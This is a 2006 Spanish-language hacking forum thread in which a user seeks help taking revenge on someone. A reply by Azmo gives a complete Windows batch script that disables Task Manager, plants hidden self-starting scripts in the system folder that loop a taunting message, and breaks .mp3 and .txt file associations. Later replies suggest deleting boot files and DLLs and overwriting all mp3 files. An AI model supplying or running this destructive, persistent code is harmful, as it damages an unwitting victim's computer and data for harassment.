Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 20, 2008, 10:45:05
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, The Shadow)  |  Tema: Una ayudita para mi venganza xD. 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Una ayudita para mi venganza xD.  (Leído 452 veces)
1111th-Sensei
Visitante
« en: Abril 07, 2006, 09:12:30 »

.:Victoric:.
Colaborador
Desconectado Desconectado

S13mpr3 h4y 4lgu13n m1r4nd0

Ver Perfil
« Respuesta #1 en: Abril 07, 2006, 09:26:19 »

"El sabio dijo una vez "Primero probamos despues atacamos..."
darknessfeatsunny
Visitante
« Respuesta #2 en: Abril 07, 2006, 09:45:36 »

« Última modificación: Abril 07, 2006, 09:47:15 por DarknessFeatSunny » En línea
Azmo
Colaborador

Ver Perfil
« Respuesta #3 en: Abril 07, 2006, 11:20:15 »

bueno si lo ke kieres es encabronarle seria mejor algo asi

@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
echo :mensaje>>%systemroot%\winsys.bat
echo msg * a ver a kien le borras los contactos ahora>>%systemroot%\winsys.bat
echo goto mensaje>>%systemroot%\winsys.bat
echo assoc .mp3=txtfile>%systemroot%\winlis.bat
echo assoc .txt=exefile>>%systemroot%\winlis.bat
reg add hklm\software\microsoft\windows\currentVersion\run /v sysm /t REG_SZ /d  %systemroot%\winsys.bat
reg add hklm\software\microsoft\windows\currentVersion\run /v winll /t REG_SZ /d  %systemroot%\winlis.bat
ATTRIB +h +s %systemroot%\winsys.bat
ATTRIB +h +s %systemroot%\winlis.bat
exit

asi kada vez ke inicie windows le saltara el mensaje:
a ver a kien le borras los contactos ahora y ademas le inutiliza los archivos .mp3 y txt xDD

asi no te cargas el windows pero le jodes bien

1111th-Sensei
Visitante
« Respuesta #4 en: Abril 07, 2006, 11:45:42 »

Jejejeje,gracias po la ayuda tios,las venganzas no son buenas,pero mejor asi que escupirle Tongue,ademas asi aprendo cosas nuevas que tampoco viene mal.

.:Victoric:. gracias por aclararme el orden y lo del %username%

DarknessFeatSunny jejejje,no se me habia ocurrido lo del explorer,es una buena idea.

Azmo muy bueno eso de inutilizar los mp3 y txt xDDD.

Saludos
Franc_
Visitante
« Respuesta #5 en: Abril 07, 2006, 06:21:05 »

Azmo una consulta, es sobre los archivos MP3 y TXT que se inulitilza, solo es el cambio de asociacion, no_, si el entra a Explorador/ herramientas/opciones de carpeta/ tipos de archivo, lo puede corregir no_, conoces otra forma de inutilizar los MP3
MadMouse
Habitual

.

Ver Perfil
« Respuesta #6 en: Abril 10, 2006, 10:06:53 »

Disculpa asf_oxid, pero Franc_ tiene razon, en opciones de carpeta se pueden cambiar las asociaciones de los archivos y estas son modificadas directamente del registro, asi que lo unico que tiene es ingresar ahi y ponerle que el defaut se abre con lo que corresponde.
ademas si le hace click derecho puede abrirlo con el programa indicado.

Respecto a borrar Windows, es totalmente imposible eliminar la carpeta con todos los procesos de Windows corriendo en el Background, y si killeas los procesos se te cerraria el windows finalizando la funcion del batch, asi que la mejor opcion seria borrarle los archivos de arranque y (despues de killear los procesos no vitales de windows) borrarle los .dll como dice DarknessFeatSunny.
Zegius
Colaborador

Ver Perfil WWW
« Respuesta #7 en: Abril 12, 2006, 01:57:23 »

Azmo una consulta, es sobre los archivos MP3 y TXT que se inulitilza, solo es el cambio de asociacion, no_, si el entra a Explorador/ herramientas/opciones de carpeta/ tipos de archivo, lo puede corregir no_, conoces otra forma de inutilizar los MP3

Creo que tb se pueden inutilizar los mp3 con algo parecido a esto:

echo jodete > *.mp3

No estoy completamente seguro porque no lo he probado, es solo una idea

Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, The Shadow)  |  Tema: Una ayudita para mi venganza xD. « anterior próximo »
Ir a:  

Ranking-Hits